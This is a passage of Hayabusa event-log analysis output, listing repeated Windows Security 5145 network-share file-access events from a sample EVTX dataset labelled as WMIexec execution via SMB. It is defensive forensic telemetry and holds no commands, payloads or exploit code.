20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 